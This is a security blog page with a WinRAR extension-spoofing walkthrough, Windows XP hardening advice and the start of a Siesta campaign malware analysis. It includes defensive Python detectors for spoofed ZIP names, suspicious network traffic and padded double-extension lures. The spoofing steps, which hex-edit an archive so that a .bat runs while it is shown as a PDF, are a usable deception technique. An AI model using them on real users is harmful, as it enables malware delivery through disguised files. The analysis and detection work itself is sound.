A few days ago I read this post: <a href="http://an7isec.blogspot.com.es/2014/03/winrar-file-extension-spoofing-0day.html" target="_blank">WinRar File extension spoofing ( 0DAY )</a>. There, the author describes, for example, how to create a ZIP file containing a file which has a JPG extension, but when it is opened directly from WinRAR, an EXE file is executed.<br />
<br />
This vulnerability affects WinRAR v4.20, and other versions could be affected too.</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
In this post, we will create a ".bat" file which executes a ping command against a Google server (imagine it performing malicious actions instead...). It will be compressed in ZIP format and, using a hex editor, we will change its extension to ".pdf" inside the compressed file. When the user opens it, the ".bat" file will be executed instead of the "fake" PDF being opened.</div>
<br />
These are the steps to follow.<br />
<br />
<ul style="text-align: justify;">
<li>Create the ".bat" file. You could use ".vbs", ".exe" or whatever... A hacker would use their own malware... In our proof of concept I've used a ".bat" file with the name "Best Security Tools 2014.bat".</li>
</ul>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEikzkn8bIhza72BMQ24QEs4v-_3hj75LWTsBq0j-iFL2LjxgGPn2SD4DY1KaO-RVoaG4Oiaaqdt1DiJhk7fQPHmrdSO2Njnd49ALfEX_EdfpE2j60etoVEKZCD3GIjMIuCVBcvAcuaTkno/s1600/0.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEikzkn8bIhza72BMQ24QEs4v-_3hj75LWTsBq0j-iFL2LjxgGPn2SD4DY1KaO-RVoaG4Oiaaqdt1DiJhk7fQPHmrdSO2Njnd49ALfEX_EdfpE2j60etoVEKZCD3GIjMIuCVBcvAcuaTkno/s1600/0.png" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh1LGcFftQobGCrDDWP0volSMwbPPdYCUlyChAW4TR93HTWf43L0WXQyezIbKpZ5hHXlmvFGlYzo8TF1IQS6OlgSJQefpy9E9ymmMTvR7IOx_bzltAO-2nkMrnqmZAMeYG4xunRi6nK4Hs/s1600/0.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><br /></a></div>
<ul>
<li>Compress the file in a ZIP file using WinRar.</li>
</ul>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgEosTjQfgUvxlxN5m-9ne7KA8TzJrHy8rOCbJDi_KiZW5P5dkqS5KjkiQW2QhVlvdvISzLORZxr9gBQi7LqzlkkHg8qdPIapfuasuJgmC3iwn1fGPED4dk_-3s0jt-CQBBB4Yw5MZVC9A/s1600/2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgEosTjQfgUvxlxN5m-9ne7KA8TzJrHy8rOCbJDi_KiZW5P5dkqS5KjkiQW2QhVlvdvISzLORZxr9gBQi7LqzlkkHg8qdPIapfuasuJgmC3iwn1fGPED4dk_-3s0jt-CQBBB4Yw5MZVC9A/s1600/2.png" /></a></div>
<br />
<ul>
<li>We can see our file with the ".bat" extension inside the ZIP file.</li>
</ul>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgTAXZY_qmo4_CfSF9j43XUw_-tkAI6N2ItUyOCTetzIhFF-_DLNZ6mOlz7veM-rcY0SNEJPUFRQi7fhYfipzXLjmoT-sPXa6PI7keh4Meql5qq6SglVPRYtHYZpLeY2tqhGDvfknAdMXA/s1600/3.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgTAXZY_qmo4_CfSF9j43XUw_-tkAI6N2ItUyOCTetzIhFF-_DLNZ6mOlz7veM-rcY0SNEJPUFRQi7fhYfipzXLjmoT-sPXa6PI7keh4Meql5qq6SglVPRYtHYZpLeY2tqhGDvfknAdMXA/s1600/3.png" /></a></div>
<br />
<ul>
<li>If you open the ZIP file with <a href="http://www.chmaas.handshake.de/delphi/freeware/xvi32/xvi32.htm#download" target="_blank">XVI32</a> you will see the name of the file twice inside the compressed file.</li>
</ul>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg1twbT7g2huSpUkG84aK8k-MEbyz-lJZZ9sLX17BToFG-fyO1Ug0geOcl823kvUOyz8kBY7oOWErq36OIliAY6x5t9uKmdnhpxizC_sT4TCnHrpLx1WH_W8e93fWCP4Uv3Hr5FNEel_Sw/s1600/4.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg1twbT7g2huSpUkG84aK8k-MEbyz-lJZZ9sLX17BToFG-fyO1Ug0geOcl823kvUOyz8kBY7oOWErq36OIliAY6x5t9uKmdnhpxizC_sT4TCnHrpLx1WH_W8e93fWCP4Uv3Hr5FNEel_Sw/s1600/4.png" /></a></div>
<br />
<ul>
<li>Now, we need to change the second one. I've renamed the file to ".pdf" and I've saved it.</li>
</ul>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg6YdkQH-N_fZdr0f5lXxwTCkVViscYnvCpXN3INCCrvjG3HZ9Na5YGPOICWCQbN3csPlHrx-CkVJQf9AiXFsHn8X3TNPUIKwlE8Qz1v8u1LFMkByn-JF3BUdyQUStyd_uj1dx4Bgd74tM/s1600/5.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg6YdkQH-N_fZdr0f5lXxwTCkVViscYnvCpXN3INCCrvjG3HZ9Na5YGPOICWCQbN3csPlHrx-CkVJQf9AiXFsHn8X3TNPUIKwlE8Qz1v8u1LFMkByn-JF3BUdyQUStyd_uj1dx4Bgd74tM/s1600/5.png" /></a></div>
<br />
<ul>
<li>If we open the ZIP file again, we can see a file with a PDF extension...</li>
</ul>
<br />
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi8GxeNGJ6_eHSYpCExw-g1eGbdku3V5aOre4sxlELOmfjsu-XJIobp7ZMX4U6Cu5ikjfFtKuI6UwpMV8hCBJdkGq1vg4l6-mHa1wFngj5vTTmiYiQTj0Tr9oG6RB7wPs4DGj9WaZkNhFQ/s1600/6.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi8GxeNGJ6_eHSYpCExw-g1eGbdku3V5aOre4sxlELOmfjsu-XJIobp7ZMX4U6Cu5ikjfFtKuI6UwpMV8hCBJdkGq1vg4l6-mHa1wFngj5vTTmiYiQTj0Tr9oG6RB7wPs4DGj9WaZkNhFQ/s1600/6.png" /> </a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<ul>
<li>... but if we open it directly from WinRAR, the .bat file is executed...</li>
</ul>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi8E-iEV8Kfa8WNullQtxZ3ETSaRVHJLT5gkkGZflAtbyPlcaNG8stMmmXzMu0SXV9KdADHmHqOrLGPbcDMotkxa7CoLbecwOF59n36DEtIL1x7EQjJzW5skOjeFGUlwLi9vFowxLBFEf4/s1600/8.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi8E-iEV8Kfa8WNullQtxZ3ETSaRVHJLT5gkkGZflAtbyPlcaNG8stMmmXzMu0SXV9KdADHmHqOrLGPbcDMotkxa7CoLbecwOF59n36DEtIL1x7EQjJzW5skOjeFGUlwLi9vFowxLBFEf4/s1600/8.png" /></a></div>
<br />
<div style="text-align: justify;">
But if you uncompress the file into a folder, you will see the real file "Best Security Tools 2014.bat" instead of the "fake" file "Best Security Tools 2014.pdf".</div>
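Why the name appears twice, and how to spot an archive where the two copies disagree, as an added example that is not from the original post or from WinRAR: the ZIP format stores each filename once in the local file header in front of the data and once in the central directory at the end of the archive, and the "second one" edited above is the central directory copy. The checker below walks both and reports mismatches; the archive is constructed in memory with a harmless batch file, and the spoofed variant edits only the central directory copy, exactly as in the steps above.

```python
import io
import struct
import zipfile
from typing import List, Tuple

LOCAL_SIG = b"PK\x03\x04"      # local file header, precedes each file's data
CENTRAL_SIG = b"PK\x01\x02"    # central directory entry, the listing at the end
EOCD_SIG = b"PK\x05\x06"       # end of central directory record


def find_name_mismatches(data: bytes) -> List[Tuple[str, str]]:
    """Return (central_directory_name, local_header_name) pairs that disagree.

    A viewer that lists the archive from the central directory but names the
    extracted file from the local header shows one name and runs another when
    the two copies have been edited to differ.
    """
    eocd = data.rfind(EOCD_SIG)
    if eocd < 0:
        raise ValueError("not a ZIP file: no end-of-central-directory record")
    # EOCD: total entries (2 bytes) at +10, directory size at +12, directory offset at +16
    entries, _cd_size, cd_offset = struct.unpack_from("<HII", data, eocd + 10)
    mismatches = []
    pos = cd_offset
    for _ in range(entries):
        if data[pos:pos + 4] != CENTRAL_SIG:
            raise ValueError("corrupt central directory")
        name_len, extra_len, comment_len = struct.unpack_from("<HHH", data, pos + 28)
        local_off = struct.unpack_from("<I", data, pos + 42)[0]
        central_name = data[pos + 46:pos + 46 + name_len]
        if data[local_off:local_off + 4] != LOCAL_SIG:
            raise ValueError("central directory entry does not point at a local header")
        local_name_len = struct.unpack_from("<H", data, local_off + 26)[0]
        local_name = data[local_off + 30:local_off + 30 + local_name_len]
        if central_name != local_name:
            mismatches.append((central_name.decode("utf-8", "replace"),
                               local_name.decode("utf-8", "replace")))
        pos += 46 + name_len + extra_len + comment_len
    return mismatches


def build_sample(spoofed: bool) -> bytes:
    """Constructed archive with one harmless .bat; optionally rename only the central copy."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_STORED) as zf:
        zf.writestr("Best Security Tools 2014.bat", "@echo off\r\necho constructed sample\r\n")
    data = buf.getvalue()
    if spoofed:
        # Everything after the first central directory signature is the listing;
        # the local header before it keeps the real ".bat" name.
        head, sig, tail = data.partition(CENTRAL_SIG)
        data = head + sig + tail.replace(b"2014.bat", b"2014.pdf", 1)
    return data


if __name__ == "__main__":
    for spoofed in (False, True):
        print("spoofed" if spoofed else "clean  ", find_name_mismatches(build_sample(spoofed)))
```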
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
So, I think there is nothing more to say about the capabilities this technique has. Imagine mixing this technique with the one used in the <a href="http://www.behindthefirewalls.com/2014/03/siesta-campaign-nothing-is-what-it-seems.html" target="_blank">Siesta Campaign</a>...</div>
<br />
<br />Javier Nietohttp://www.blogger.com/profile/05976836878834402718noreply@blogger.com2tag:blogger.com,1999:blog-3160485247929481680.post-82639206982756913082014-04-08T14:03:00.000-07:002014-04-07T14:03:34.223-07:00Microsoft XP has died but millions of Zombies-XP are out there<div style="text-align: justify;">
<h2>
Introduction </h2>
After 12 years, support for Windows XP ends today, April 8, 2014. That means there will be no more security updates or technical support for Windows XP. So XP has officially died, but millions of computers with this operating system installed are still "alive" and will be unprotected against new threats from now on; these are the Zombies-XP. Even thousands of ATMs and other critical infrastructures will be using this OS for a while, and nobody knows how long...</div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjQmdXSwI4jMkdoDh6uQhLt2Ee8vidub9uKQ3I8EUfGxH5smSk2qwtF2InTIqoC-9Cs28jGk72mlx7XfboQOhQ6DJIgZELy7A9JNwwRpbGzkdZr6hdfiXt2uu8imc4xsDM7ZVFylCymS1o/s1600/Zombie_XP_by_killer7.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjQmdXSwI4jMkdoDh6uQhLt2Ee8vidub9uKQ3I8EUfGxH5smSk2qwtF2InTIqoC-9Cs28jGk72mlx7XfboQOhQ6DJIgZELy7A9JNwwRpbGzkdZr6hdfiXt2uu8imc4xsDM7ZVFylCymS1o/s1600/Zombie_XP_by_killer7.jpg" height="200" width="320" /></a></div>
<div style="text-align: justify;">
And what is the advice from Microsoft? We have two options.<br />
<br />
1. To upgrade to a newer Windows operating system like Windows 7 or Windows 8.1.</div>
<div style="text-align: justify;">
</div>
<div style="text-align: justify;">
2. "If your current PC can't run Windows 8.1, it might be time to consider shopping for a new one."</div>
<br />
<br />
<div style="text-align: justify;">
Sure, we should upgrade to the latest Windows OS. If our hardware doesn't support it, we should buy a new computer (or hundreds, in the case of some companies), install Windows 8.1, work hard to transfer all the data from one computer to another, teach the users to use Windows 8.1, etc... Or maybe it is a great opportunity to move to a free Linux operating system, but that is another issue...</div>
<br />
<div style="text-align: justify;">
This post is focused on users or companies who cannot upgrade to the latest Windows OS for different reasons, like not being able to afford new computers, having old software which is not capable of running on another OS, not having enough staff to perform the upgrade, etc...</div>
<h2>
The main threats we need to deal with</h2>
First of all, we need to keep in mind the attack vectors we need to fight against.
<br />
<ul>
<br />
<li style="text-align: justify;">Browser-based attacks. I think these attacks could be the most common attacks at this moment. A website could take advantage of a web browser vulnerability just by visiting it. Also, a website could exploit a plugin enabled in the web browser, like Java or Adobe plugins, in the same way.</li>
</ul>
<br />
<ul>
<li style="text-align: justify;">Network exploits. New worms could be designed to exploit the Windows XP services running on a computer. Now that these services will no longer be patched, the same worm will keep working even after it has been discovered.</li>
</ul>
<br />
<ul style="text-align: justify;">
<li>Social engineering techniques. These techniques try to trick<span class="short_text" id="result_box" lang="en" tabindex="-1"><span class="hps"> a user into opening a link in an email or opening an attachment that is supposed to be a PDF file or some other "legitimate" file, in order to infect a machine. Look at the case of the <a href="http://www.behindthefirewalls.com/2014/03/siesta-campaign-nothing-is-what-it-seems.html" target="_blank">Siesta Campaign.</a></span></span></li>
</ul>
<br />
<div style="text-align: justify;">
<div style="text-align: justify;">
<span class="short_text" id="result_box" lang="en" tabindex="-1"><span class="hps">These attack vectors are common to other OSes, but in this case it is really dangerous to use one which will not receive security updates in the future. We will be vulnerable to </span></span><span class="short_text" id="result_box" lang="en" tabindex="-1"><span class="hps"><span class="short_text" id="result_box" lang="en" tabindex="-1"><span class="hps">zero-day threats</span></span> (which is common to all OSes) and to known threats. Without security updates we can't fix the latter.</span></span></div>
<span class="short_text" id="result_box" lang="en" tabindex="-1"><span class="hps"></span></span></div>
<h2>
Suggested solutions</h2>
<div style="text-align: justify;">
Here, I will suggest some advice to try to keep your environment more secure using Windows XP.</div>
<div style="text-align: justify;">
<br /></div>
<ul style="text-align: justify;">
<li>Most antivirus software manufacturers plan to support Microsoft XP until at least April 2016. So try not to select one which stops supporting XP before that date.</li>
</ul>
<br />
<ul style="text-align: justify;">
<li>Choose a web browser with a long-term support plan like Google Chrome which <a href="http://chrome.blogspot.com.es/2013/10/extending-chrome-support-for-xp-users.html%20" target="_blank">extends the support for XP users until April 2015</a>. On the other hand, Mozilla Vice President said: "We have no plans to discontinue support for our XP users", so consider using this browser too.</li>
</ul>
<br />
<ul style="text-align: justify;">
<li>Try not to use plugins in your browser like Java, Adobe Reader, Adobe Flash... but if you need them, be sure they are updated (if there are updates available). I use this <a href="https://browserscan.rapid7.com/scanme" target="_blank">site</a> to check whether my browser plugins are up to date. </li>
</ul>
<br />
<ul style="text-align: justify;">
<li>Don't use administrative accounts. Most exploits targeting desktop software (like web browsers and the plugins mentioned above) are mitigated if the user account is a standard user.</li>
</ul>
<br />
<ul>
<li style="text-align: justify;">Isolate your Windows XP computers in multiple subnetworks behind your network firewalls. That is really important because your XP is already vulnerable and when it is infected, it will be used by hackers to pivot to other systems in your network to try to get access to your data and network resources.</li>
</ul>
<br />
<ul style="text-align: justify;">
<li>Monitor these isolated networks to find suspicious activities. Monitor your network traffic to look for possible command and control connections, an increase of network activity, internal probing techniques, brute force attempts from these networks, etc...</li>
</ul>
<ul style="text-align: justify;">
<li>Limit access to the Internet. It is important not to give your users unrestricted Internet access: use proxy rules or URL filtering on your firewalls and allow only the sites needed for work. The goal is to keep users away from sites hosting exploit kits and other attacks. Yes, legitimate sites do get compromised and start spreading malware, as in <a href="http://www.behindthefirewalls.com/2013/10/analysis-attack-technical-analysis-php.html" target="_blank">the attack on php.net</a>, but restricting access to everything else still lowers the risk.</li>
</ul>
<br />
<ul style="text-align: justify;">
</ul>
<ul>
<li style="text-align: justify;">Teach your users to be careful. Every user could be targeted for attack using social engineering. No matter the position of the employees, each computer is a good entry point to pivot to your network. Advise them to check and <span class="short_text" id="result_box" lang="en" tabindex="-1"><span class="hps">be suspicious of each email they receive. If they have doubts, they must ask the security department.</span></span></li>
</ul>
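<div style="text-align: justify;">
To make the monitoring advice concrete, here is an added example (mine, not from the original post): a Python script that reads constructed firewall log lines from the isolated XP subnet and flags the three behaviours described above, an internal host sweep, password guessing against a login service, and outbound connections at a suspiciously regular interval. The log format, the 10.10.0.0/24 subnet, the port list and the thresholds are all assumptions; adapt them to whatever your firewall exports.</div>

```python
import ipaddress
import re
import statistics
from collections import defaultdict
from datetime import datetime, timedelta

# Assumed layout: the isolated Windows XP subnet and the rest of the internal address space.
XP_SUBNET = ipaddress.ip_network("10.10.0.0/24")
INTERNAL = [ipaddress.ip_network(n) for n in ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16")]
AUTH_PORTS = {22, 23, 445, 3389}  # services worth watching for password guessing

# Assumed firewall log format: "<date> <time> <src_ip> <dst_ip> <dst_port> <action>"
LINE_RE = re.compile(r"^(\S+ \S+) (\S+) (\S+) (\d+) (\w+)$")


def parse(lines):
    """Turn raw log lines into (timestamp, src, dst, port, action) tuples; malformed lines are skipped."""
    events = []
    for line in lines:
        m = LINE_RE.match(line.strip())
        if not m:
            continue
        ts = datetime.strptime(m.group(1), "%Y-%m-%d %H:%M:%S")
        events.append((ts, ipaddress.ip_address(m.group(2)), ipaddress.ip_address(m.group(3)),
                       int(m.group(4)), m.group(5)))
    return events


def is_internal(ip):
    return any(ip in net for net in INTERNAL)


def analyze(lines, scan_hosts=10, scan_ports=10, brute_hits=20, beacon_min=6, beacon_jitter=0.2):
    """Return findings as (kind, subject, value) tuples for traffic sourced from the XP subnet."""
    hosts_touched = defaultdict(set)   # src -> internal hosts contacted (host sweep)
    ports_touched = defaultdict(set)   # (src, dst) -> ports contacted (port scan)
    auth_attempts = defaultdict(int)   # (src, dst, port) -> connection count (brute force)
    outbound = defaultdict(list)       # (src, dst, port) -> timestamps (beaconing)
    for ts, src, dst, port, _action in parse(lines):
        if src not in XP_SUBNET:
            continue
        if is_internal(dst):
            hosts_touched[src].add(dst)
            ports_touched[(src, dst)].add(port)
            if port in AUTH_PORTS:
                auth_attempts[(src, dst, port)] += 1
        else:
            outbound[(src, dst, port)].append(ts)

    findings = []
    for src, hosts in hosts_touched.items():
        if len(hosts) >= scan_hosts:
            findings.append(("internal_host_sweep", str(src), len(hosts)))
    for (src, dst), ports in ports_touched.items():
        if len(ports) >= scan_ports:
            findings.append(("internal_port_scan", f"{src}->{dst}", len(ports)))
    for (src, dst, port), count in auth_attempts.items():
        if count >= brute_hits:
            findings.append(("brute_force", f"{src}->{dst}:{port}", count))
    for (src, dst, port), times in outbound.items():
        if len(times) < beacon_min:
            continue
        times.sort()
        gaps = [(b - a).total_seconds() for a, b in zip(times, times[1:])]
        mean = statistics.mean(gaps)
        # Regular inter-connection gaps (low relative spread) are the classic beacon shape.
        if mean > 0 and statistics.pstdev(gaps) / mean < beacon_jitter:
            findings.append(("c2_beacon", f"{src}->{dst}:{port}", round(mean)))
    return findings


def _constructed_log():
    """Constructed sample: one sweeping host, one password guesser, one beacon, one normal user."""
    base = datetime(2014, 3, 10, 9, 0, 0)

    def stamp(seconds):
        return f"{base + timedelta(seconds=seconds):%Y-%m-%d %H:%M:%S}"

    lines = [f"{stamp(i)} 10.10.0.21 172.16.5.{10 + i} 445 allow" for i in range(12)]        # host sweep
    lines += [f"{stamp(60 + i)} 10.10.0.22 172.16.5.50 22 deny" for i in range(25)]           # brute force
    lines += [f"{stamp(300 * i)} 10.10.0.23 203.0.113.7 80 allow" for i in range(8)]          # beacon, 5 min
    lines += [f"{stamp(s)} 10.10.0.24 198.51.100.9 80 allow" for s in (5, 17, 140, 141, 600)]  # browsing
    lines.append(f"{stamp(900)} 10.20.0.5 172.16.5.10 445 allow")  # not from the XP subnet, ignored
    return lines


SAMPLE_LOG = _constructed_log()

if __name__ == "__main__":
    for finding in analyze(SAMPLE_LOG):
        print(finding)
```

Run it as-is to see the three findings on the constructed log; in practice feed it the denied and allowed connections logged for the XP subnet's firewall rules and tune the thresholds to the size of that subnet.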
<br />
<br />Javier Nieto (http://www.blogger.com/profile/05976836878834402718, noreply@blogger.com), 0 comments
<br />tag:blogger.com,1999:blog-3160485247929481680.post-8961815137495383562 | published 2014-03-26T10:24:00.000-07:00 | updated 2014-03-31T02:24:29.945-07:00
<br />Siesta Campaign - Nothing is what it seems<div style="text-align: justify;">
<h3>
Introduction </h3>
A few weeks ago Trend Micro published the following post on their blog: <a href="http://blog.trendmicro.com/trendlabs-security-intelligence/the-siesta-campaign-a-new-targeted-attack-awakens/?utm_source=feedburner&utm_medium=feed&utm_campaign=Feed%3A+Anti-MalwareBlog+%28Trendlabs+Security+Intelligence+Blog%29" target="_blank">The Siesta Campaign: A New Targeted Attack Awakens</a>. In it they share their research on a targeted attack against all kinds of industries: energy, finance, health care, public administration... A few days later, FireEye published a post called <a href="http://www.fireeye.com/blog/technical/targeted-attack/2014/03/a-detailed-examination-of-the-siesta-campaign.html" target="_blank">A Detailed Examination of the Siesta Campaign</a>, in which they attribute these attacks to the <a href="http://intelreport.mandiant.com/" target="_blank">APT1</a> group, or to another group that uses the same tactics and tools.</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
Because Trend Micro shared the checksum of one variant of the malware sample, I was able to get a copy of it and dig deeper into this campaign.
</div>
<br />
<div style="text-align: left;">
</div>
<div style="text-align: center;">
SHA1: <a href="https://www.virustotal.com/en/file/943a7838f3eccc0984219642f533deaffb7b99e8c1d51157115bc87cf72aa80f/analysis/" target="_blank">014542eafb792b98196954373b3fd13e60cb94fe</a> </div>
<h3>
Spear-Phishing and Social Engineering Techniques</h3>
<div style="text-align: justify;">
Both posts state that the campaign began with a spear-phishing email containing links to archives. The file was named "<i>Questionaire Concerning the Spread of Superbugs February 2014.exe</i>" and was delivered inside a ZIP file hosted on a remote server.</div>
<div style="text-align: justify;">
<br />
I guess the attackers used the same technique described in the <a href="http://intelreport.mandiant.com/" target="_blank">APT1</a> report written by Mandiant: the file appears to have a PDF extension, but the file name actually contains several spaces after ".pdf" followed by ".exe", the real extension. In the picture below you can see the file that looks like a PDF.<br />
</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjMO_Xmf8V2bNVCM4QwV1IMw1WpvfMIB970v9ZNt_XDIuZ-x7Otm7mCSwDsClxj-gM6N9JT-HiHAdaGE2PCXotuF2Z7fc4igD00-ppkwEbyUQ_gI31oRMknmJVmQLs-ayuPdyaJRDpD3sk/s1600/pdf.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjMO_Xmf8V2bNVCM4QwV1IMw1WpvfMIB970v9ZNt_XDIuZ-x7Otm7mCSwDsClxj-gM6N9JT-HiHAdaGE2PCXotuF2Z7fc4igD00-ppkwEbyUQ_gI31oRMknmJVmQLs-ayuPdyaJRDpD3sk/s1600/pdf.png" height="267" width="400" /></a></div>
<br />
If we switch to the details view, it still shows up as a PDF file... <br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhwgW-jgeIecbMlBHw38iM1SRIyHv5jw7An4B2hev6HYaCPFXRpg4_JOyHaZJrw5bg7_KgBSw_3s803NX6pAjks05OrqR_SrO9jeJGAbjInnXVF9XvsBsLHbOOIIThBnO6WlILZX5mtwRg/s1600/PDF2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhwgW-jgeIecbMlBHw38iM1SRIyHv5jw7An4B2hev6HYaCPFXRpg4_JOyHaZJrw5bg7_KgBSw_3s803NX6pAjks05OrqR_SrO9jeJGAbjInnXVF9XvsBsLHbOOIIThBnO6WlILZX5mtwRg/s1600/PDF2.png" height="19" width="640" /></a></div>
<br />
<div style="text-align: justify;">
... but it is not actually a PDF file. It looks like one, but it is an executable...</div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh8qAl8WBqBhugsCZcBFzg4BKUAIc5AyZHTFHg9jlrMFSE5fJ0rPTGNdc3EW19yZCgUq1RlsBe0jlBTlctD237WJvdbxUQjzoQw_CwIPAH8ycwR69pa6NwlfjV6kl0bZVbI-GbdERRHH2s/s1600/PDF3.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh8qAl8WBqBhugsCZcBFzg4BKUAIc5AyZHTFHg9jlrMFSE5fJ0rPTGNdc3EW19yZCgUq1RlsBe0jlBTlctD237WJvdbxUQjzoQw_CwIPAH8ycwR69pa6NwlfjV6kl0bZVbI-GbdERRHH2s/s1600/PDF3.png" height="14" width="640" /></a></div>
<br />
<div style="text-align: justify;">
This is how the file is shown on the Desktop. To an untrained eye it really looks like a PDF file.</div>
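<div style="text-align: justify;">
As an added example (not part of the original analysis), the following Python triage helper applies the two observations above, the padded ".pdf&nbsp;&nbsp;&nbsp;.exe" name and executable content behind a document-looking name, to a file name and the first bytes of its content. It also covers the plain double extension (invoice.pdf.exe), a generalisation the post does not discuss. The extension lists and the magic-byte table are my assumptions, and the header bytes are a constructed stand-in for the sample, not bytes taken from it.</div>

```python
import re

# Extensions Windows runs as code, and extensions users read as harmless documents (assumed lists).
EXECUTABLE_EXT = {".exe", ".scr", ".com", ".pif", ".bat", ".cmd", ".js", ".vbs"}
DOCUMENT_EXT = {".pdf", ".doc", ".docx", ".xls", ".xlsx", ".ppt", ".pptx", ".txt", ".jpg"}

# Leading bytes of the containers we care about: a PE executable versus the formats a name may claim.
MAGIC = {b"MZ": "pe", b"%PDF": "pdf", b"PK\x03\x04": "zip", b"\xd0\xcf\x11\xe0": "ole"}
# What content each claimed extension should really start with.
EXPECTED = {".pdf": "pdf", ".docx": "zip", ".xlsx": "zip", ".pptx": "zip", ".zip": "zip",
            ".doc": "ole", ".xls": "ole", ".ppt": "ole", ".exe": "pe", ".scr": "pe"}

EXT = r"(\.[A-Za-z0-9]{1,5})"


def real_extension(name):
    """The extension Windows actually honours: the last one, after trailing whitespace is removed."""
    m = re.search(EXT + r"$", name.rstrip())
    return m.group(1).lower() if m else ""


def name_findings(name):
    """Heuristics on the file name alone; returns a list of human-readable reasons."""
    reasons = []
    stripped = name.rstrip()
    # 1. The Siesta trick: document extension, a run of spaces, then the executable extension.
    m = re.search(EXT + r"\s{2,}" + EXT + r"$", stripped)
    if m and m.group(1).lower() in DOCUMENT_EXT and m.group(2).lower() in EXECUTABLE_EXT:
        reasons.append(f"padded double extension: shows as {m.group(1)} but runs as {m.group(2)}")
    # 2. Generalisation: a plain double extension such as invoice.pdf.exe.
    m = re.search(EXT + EXT + r"$", stripped)
    if m and m.group(1).lower() in DOCUMENT_EXT and m.group(2).lower() in EXECUTABLE_EXT:
        reasons.append(f"double extension: shows as {m.group(1)} but runs as {m.group(2)}")
    # 3. Long runs of spaces have no business in a normal document name.
    if re.search(r" {5,}", stripped):
        reasons.append("long run of spaces in file name")
    return reasons


def sniff(head):
    """Identify the container from the first bytes of the file."""
    for magic, kind in MAGIC.items():
        if head.startswith(magic):
            return kind
    return "unknown"


def assess(name, head):
    """Combine the name heuristics with content sniffing; head is the first few bytes of the file."""
    reasons = name_findings(name)
    kind = sniff(head)
    ext = real_extension(name)
    if ext in EXPECTED and kind != "unknown" and EXPECTED[ext] != kind:
        reasons.append(f"content is {kind} but extension {ext} claims {EXPECTED[ext]}")
    return {"verdict": "suspicious" if reasons else "ok", "content": kind, "reasons": reasons}


# Constructed inputs: the lure name from the post plus a generic MZ header standing in for the binary.
SIESTA_NAME = "Questionaire Concerning the Spread of Superbugs February 2014.pdf" + " " * 40 + ".exe"
SIESTA_HEAD = b"MZ\x90\x00\x03\x00\x00\x00"

if __name__ == "__main__":
    print(assess(SIESTA_NAME, SIESTA_HEAD))
    print(assess("report.pdf", b"%PDF-1.4"))
    print(assess("report.pdf", SIESTA_HEAD))
```

The two checks are deliberately independent: the padded name is caught even when the ".exe" is honest about its content, and a renamed executable is caught even when the name looks perfectly normal.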
<br />
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: center;">
</div>
